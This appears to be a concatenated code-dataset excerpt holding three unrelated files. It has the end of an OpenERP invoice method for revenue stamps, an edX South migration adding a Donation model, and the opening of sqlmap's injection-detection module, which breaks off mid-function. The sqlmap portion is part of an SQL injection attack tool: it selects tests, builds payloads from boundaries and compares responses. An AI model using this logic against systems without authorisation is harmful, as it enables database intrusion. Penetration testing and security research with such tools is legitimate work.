        if the partner has 'charge_revenue_stamp' selected, it adds the product with the revenue stamp cost;
        otherwise, it adds the product at zero cost
"""
if not ids:
return True
if isinstance(ids, (list, tuple)):
ids = ids[0]
product_toinvoice_ids = []
invoice = self.browse(cr, uid, ids, context)
if not invoice.partner_id or not invoice.invoice_line:
return False
partner = invoice.partner_id
product_obj = self.pool.get('product.product')
revenue_product_id = product_obj.search(cr, uid, [('unique_revenue_stamp_id.unique_revenue_stamp', '=', True)])
if revenue_product_id:
revenue_product = product_obj.browse(cr, uid, revenue_product_id[0], context)
if partner.charge_invoice_cost:
for product_toinvoice_id in partner.product_toinvoice_ids:
product_toinvoice_ids.append(product_toinvoice_id.product_id.id)
base_tax_amount = 0.0
for invoice_tax in invoice.tax_line:
if invoice_tax.tax_code_id.stamp_in_invoice:
base_tax_amount += invoice_tax.base_amount
add_product_stamp = False
if base_tax_amount >= revenue_product.unique_revenue_stamp_id.min_for_stamp:
add_product_stamp = True
if partner.charge_revenue_stamp:
price = revenue_product.product_tmpl_id.list_price
else:
price = 0.0
for invoice_line in invoice.invoice_line:
if invoice_line.product_id.id == revenue_product_id[0]:
add_product_stamp = False
for invoice_product_id in product_toinvoice_ids:
if invoice_line.product_id.id == invoice_product_id:
product_toinvoice_ids.remove(invoice_product_id)
invoice_lines = []
if add_product_stamp:
invoice_lines.append({
'name': revenue_product.name,
'product_id': revenue_product_id[0],
'quantity': 1.0,
'uos_id': revenue_product.product_tmpl_id.uom_id.id,
'price_unit': price,
'price_subtotal': price,
'partner_id': partner.id,
'invoice_id': invoice.id,
'account_id': invoice.invoice_line[0].account_id.id,
'company_id': invoice.company_id.id,
})
if product_toinvoice_ids:
partner_toinvoice_products = self.pool.get('toinvoice.product').browse(cr, uid, product_toinvoice_ids, context)
for partner_toinvoice_product in partner_toinvoice_products:
invoice_lines.append({
'name': partner_toinvoice_product.product_id.name,
'product_id': partner_toinvoice_product.product_id.id,
'quantity': partner_toinvoice_product.qty,
'uos_id': partner_toinvoice_product.product_id.product_tmpl_id.uom_id.id,
'price_unit': partner_toinvoice_product.product_id.product_tmpl_id.list_price,
'price_subtotal': partner_toinvoice_product.product_id.product_tmpl_id.list_price,
'partner_id': partner.id,
'invoice_id': invoice.id,
'account_id': invoice.invoice_line[0].account_id.id,
'company_id': invoice.company_id.id,
})
invoice_line_obj = self.pool.get('account.invoice.line')
for invoice_line in invoice_lines:
invoice_line_obj.create(cr, uid, invoice_line, context)
return True
| agpl-3.0 | 90,073,274,615,023,060 | 41.759777 | 159 | 0.615495 | false |
SivilTaram/edx-platform | lms/djangoapps/shoppingcart/migrations/0018_auto__add_donation.py | 120 | 15611 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Donation'
db.create_table('shoppingcart_donation', (
('orderitem_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['shoppingcart.OrderItem'], unique=True, primary_key=True)),
('donation_type', self.gf('django.db.models.fields.CharField')(default='general', max_length=32)),
('course_id', self.gf('xmodule_django.models.CourseKeyField')(max_length=255, db_index=True)),
))
db.send_create_signal('shoppingcart', ['Donation'])
def backwards(self, orm):
# Deleting model 'Donation'
db.delete_table('shoppingcart_donation')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.coupon': {
'Meta': {'object_name': 'Coupon'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 10, 2, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'percentage_discount': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'shoppingcart.couponredemption': {
'Meta': {'object_name': 'CouponRedemption'},
'coupon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Coupon']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.courseregistrationcode': {
'Meta': {'object_name': 'CourseRegistrationCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 10, 2, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_by_user'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']", 'null': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'purchase_order'", 'null': 'True', 'to': "orm['shoppingcart.Order']"})
},
'shoppingcart.donation': {
'Meta': {'object_name': 'Donation', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'donation_type': ('django.db.models.fields.CharField', [], {'default': "'general'", 'max_length': '32'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.invoice': {
'Meta': {'object_name': 'Invoice'},
'address_line_1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'address_line_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'address_line_3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_reference': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'is_valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'total_amount': ('django.db.models.fields.FloatField', [], {}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'refunded_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'fulfilled_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'list_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '30', 'decimal_places': '2'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'refund_requested_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'report_comments': ('django.db.models.fields.TextField', [], {'default': "''"}),
'service_fee': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32', 'db_index': 'True'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.paidcourseregistrationannotation': {
'Meta': {'object_name': 'PaidCourseRegistrationAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.registrationcoderedemption': {
'Meta': {'object_name': 'RegistrationCodeRedemption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']", 'null': 'True'}),
'redeemed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 10, 2, 0, 0)', 'null': 'True'}),
'redeemed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'registration_code': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.CourseRegistrationCode']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
| agpl-3.0 | 196,891,793,819,145,280 | 81.597884 | 182 | 0.558709 | false |
glaudsonml/kurgan-ai | tools/sqlmap/lib/controller/checks.py | 1 | 61798 | #!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import copy
import httplib
import random
import re
import socket
import time
from subprocess import Popen as execute
from extra.beep.beep import beep
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import extractTextTagContent
from lib.core.common import findDynamicContent
from lib.core.common import Format
from lib.core.common import getLastRequestHTTPError
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import getSortedInjectionTests
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import intersect
from lib.core.common import listToStrValue
from lib.core.common import parseFilePaths
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import showStaticWords
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.common import urlencode
from lib.core.common import wasLastResponseDBMSError
from lib.core.common import wasLastResponseHTTPError
from lib.core.defaults import defaults
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.datatype import AttribDict
from lib.core.datatype import InjectionDict
from lib.core.decorators import cachedmethod
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import DBMS
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import HEURISTIC_TEST
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import NOTE
from lib.core.enums import NULLCONNECTION
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.enums import REDIRECTION
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
from lib.core.settings import IDS_WAF_CHECK_RATIO
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import URI_HTTP_HEADER
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.threads import getCurrentThreadData
from lib.request.connect import Connect as Request
from lib.request.inject import checkBooleanExpression
from lib.request.templates import getPageTemplate
from lib.techniques.union.test import unionTest
from lib.techniques.union.use import configUnion
def checkSqlInjection(place, parameter, value):
# Store here the details about boundaries and payload used to
# successfully inject
injection = InjectionDict()
# Localized thread data needed for some methods
threadData = getCurrentThreadData()
# Set the flag for SQL injection test mode
kb.testMode = True
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
tests = getSortedInjectionTests()
seenPayload = set()
while tests:
test = tests.pop(0)
try:
if kb.endDetection:
break
if conf.dbms is None:
# If the DBMS has not yet been fingerprinted (via simple heuristic check
# or via DBMS-specific payload) and boolean-based blind has been identified
# then attempt to identify with a simple DBMS specific boolean-based
# test what the DBMS may be
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None:
kb.heuristicDbms = heuristicCheckDbms(injection)
# If the DBMS has already been fingerprinted (via DBMS-specific
# error message, simple heuristic check or via DBMS-specific
# payload), ask the user to limit the tests to the fingerprinted
# DBMS
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
# If the DBMS has been fingerprinted (via DBMS-specific error
# message, via simple heuristic check or via DBMS-specific
# payload), ask the user to extend the tests to all DBMS-specific,
# regardless of --level and --risk values provided
if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
kb.heuristicDbms or injection.dbms):
msg = "for the remaining tests, do you want to include all tests "
msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "level (%d)" % conf.level if conf.level < 5 else ""
msg += " and " if conf.level < 5 and conf.risk < 3 else ""
msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]"
kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
title = test.title
kb.testType = stype = test.stype
clause = test.clause
unionExtended = False
if stype == PAYLOAD.TECHNIQUE.UNION:
configUnion(test.request.char)
if "[CHAR]" in title:
if conf.uChar is None:
continue
else:
title = title.replace("[CHAR]", conf.uChar)
elif "[RANDNUM]" in title or "(NULL)" in title:
title = title.replace("[RANDNUM]", "random number")
if test.request.columns == "[COLSTART]-[COLSTOP]":
if conf.uCols is None:
continue
else:
title = title.replace("[COLSTART]", str(conf.uColsStart))
title = title.replace("[COLSTOP]", str(conf.uColsStop))
elif conf.uCols is not None:
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "provided custom column range %s" % conf.uCols
logger.debug(debugMsg)
continue
match = re.search(r"(\d+)-(\d+)", test.request.columns)
if injection.data and match:
lower, upper = int(match.group(1)), int(match.group(2))
for _ in (lower, upper):
if _ > 1:
unionExtended = True
test.request.columns = re.sub(r"\b%d\b" % _, str(2 * _), test.request.columns)
title = re.sub(r"\b%d\b" % _, str(2 * _), title)
test.title = re.sub(r"\b%d\b" % _, str(2 * _), test.title)
            # Skip test if the user wants to test only for a specific
# technique
if conf.tech and isinstance(conf.tech, list) and stype not in conf.tech:
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "specified to test only for "
debugMsg += "%s techniques" % " & ".join(map(lambda x: PAYLOAD.SQLINJECTION[x], conf.tech))
logger.debug(debugMsg)
continue
# Skip test if it is the same SQL injection type already
# identified by another test
if injection.data and stype in injection.data:
debugMsg = "skipping test '%s' because " % title
debugMsg += "the payload for %s has " % PAYLOAD.SQLINJECTION[stype]
debugMsg += "already been identified"
logger.debug(debugMsg)
continue
# Parse DBMS-specific payloads' details
if "details" in test and "dbms" in test.details:
payloadDbms = test.details.dbms
else:
payloadDbms = None
# Skip tests if title, vector or DBMS is not included by the
# given test filter
if conf.testFilter and not any(conf.testFilter in str(item) or \
re.search(conf.testFilter, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is not included by the given filter"
logger.debug(debugMsg)
continue
# Skip tests if title, vector or DBMS is included by the
# given skip filter
if conf.testSkip and any(conf.testSkip in str(item) or \
re.search(conf.testSkip, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is included by the given skip filter"
logger.debug(debugMsg)
continue
if payloadDbms is not None:
# Skip DBMS-specific test if it does not match the user's
# provided DBMS
if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
debugMsg = "skipping test '%s' because " % title
debugMsg += "the provided DBMS is %s" % conf.dbms
logger.debug(debugMsg)
continue
# Skip DBMS-specific test if it does not match the
# previously identified DBMS (via DBMS-specific payload)
if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
debugMsg = "skipping test '%s' because the identified " % title
debugMsg += "back-end DBMS is %s" % injection.dbms
logger.debug(debugMsg)
continue
# Skip DBMS-specific test if it does not match the
# previously identified DBMS (via DBMS-specific error message)
if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
debugMsg = "skipping test '%s' because the parsed " % title
debugMsg += "error message(s) showed that the back-end DBMS "
debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
logger.debug(debugMsg)
continue
            # If the user did not decide to extend the tests to all
            # DBMS-specific payloads, or the test payload is not specific to the
            # identified DBMS, then only run the test if both level and risk
            # are below the corresponding configuration's level and risk
            # values
if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
# Skip test if the risk is higher than the provided (or default)
# value
if test.risk > conf.risk:
debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
debugMsg += "is higher than the provided (%d)" % conf.risk
logger.debug(debugMsg)
continue
# Skip test if the level is higher than the provided (or default)
# value
if test.level > conf.level:
debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
debugMsg += "is higher than the provided (%d)" % conf.level
logger.debug(debugMsg)
continue
# Skip test if it does not match the same SQL injection clause
# already identified by another test
clauseMatch = False
for clauseTest in clause:
if injection.clause is not None and clauseTest in injection.clause:
clauseMatch = True
break
if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
debugMsg = "skipping test '%s' because the clauses " % title
debugMsg += "differ from the clause already identified"
logger.debug(debugMsg)
continue
# Skip test if the user provided a custom character (for UNION-based payloads)
if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "provided a specific character, %s" % conf.uChar
logger.debug(debugMsg)
continue
infoMsg = "testing '%s'" % title
logger.info(infoMsg)
# Force back-end DBMS according to the current test DBMS value
# for proper payload unescaping
Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)
# Parse test's <request>
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\'')))
else:
boundaries = conf.boundaries
for boundary in boundaries:
injectable = False
# Skip boundary if the level is higher than the provided (or
# default) value
# Parse boundary's <level>
if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
continue
# Skip boundary if it does not match against test's <clause>
# Parse test's <clause> and boundary's <clause>
clauseMatch = False
for clauseTest in test.clause:
if clauseTest in boundary.clause:
clauseMatch = True
break
if test.clause != [0] and boundary.clause != [0] and not clauseMatch:
continue
# Skip boundary if it does not match against test's <where>
# Parse test's <where> and boundary's <where>
whereMatch = False
for where in test.where:
if where in boundary.where:
whereMatch = True
break
if not whereMatch:
continue
# Parse boundary's <prefix>, <suffix> and <ptype>
prefix = boundary.prefix if boundary.prefix else ""
suffix = boundary.suffix if boundary.suffix else ""
ptype = boundary.ptype
# Options --prefix/--suffix have a higher priority (if set by user)
prefix = conf.prefix if conf.prefix is not None else prefix
suffix = conf.suffix if conf.suffix is not None else suffix
comment = None if conf.suffix is not None else comment
# If the previous injections succeeded, we know which prefix,
# suffix and parameter type to use for further tests, no
# need to cycle through the boundaries for the following tests
condBound = (injection.prefix is not None and injection.suffix is not None)
condBound &= (injection.prefix != prefix or injection.suffix != suffix)
condType = injection.ptype is not None and injection.ptype != ptype
# If the payload is an inline query, test for it regardless
# of previously identified injection types
if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):
continue
# For each test's <where>
for where in test.where:
templatePayload = None
vector = None
# Treat the parameter's original value according to the
# test's <where> tag
if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:
origValue = value
if kb.tamperFunctions:
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
elif where == PAYLOAD.WHERE.NEGATIVE:
# Use a different page template than the original
# one as we are changing the parameter's value, which
# will likely result in different content
kb.data.setdefault("randomInt", str(randomInt(10)))
kb.data.setdefault("randomStr", str(randomStr(10)))
if conf.invalidLogical:
_ = int(kb.data.randomInt[:2])
origValue = "%s AND %s=%s" % (value, _, _ + 1)
elif conf.invalidBignum:
origValue = kb.data.randomInt[:6]
elif conf.invalidString:
origValue = kb.data.randomStr[:6]
else:
origValue = "-%s" % kb.data.randomInt[:4]
templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
elif where == PAYLOAD.WHERE.REPLACE:
origValue = ""
kb.pageTemplate, kb.errorIsNone = getPageTemplate(templatePayload, place)
# Forge request payload by prepending with boundary's
# prefix and appending the boundary's suffix to the
# test's ' <payload><comment> ' string
if fstPayload:
boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
if reqPayload:
if reqPayload in seenPayload:
continue
else:
seenPayload.add(reqPayload)
else:
reqPayload = None
# Perform the test's request and check whether or not the
# payload was successful
# Parse test's <response>
for method, check in test.response.items():
check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
# In case of boolean-based blind SQL injection
if method == PAYLOAD.METHOD.COMPARISON:
# Generate payload used for comparison
def genCmpPayload():
sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
# Forge response payload by prepending with
# boundary's prefix and appending the boundary's
# suffix to the test's ' <payload><comment> '
# string
boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause)
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
return cmpPayload
# Useful to set kb.matchRatio at first based on
# the False response content
kb.matchRatio = None
kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)
Request.queryPage(genCmpPayload(), place, raise404=False)
falsePage = threadData.lastComparisonPage or ""
# Perform the test's True request
trueResult = Request.queryPage(reqPayload, place, raise404=False)
truePage = threadData.lastComparisonPage or ""
if trueResult and not(truePage == falsePage and not kb.nullConnection):
# Perform the test's False request
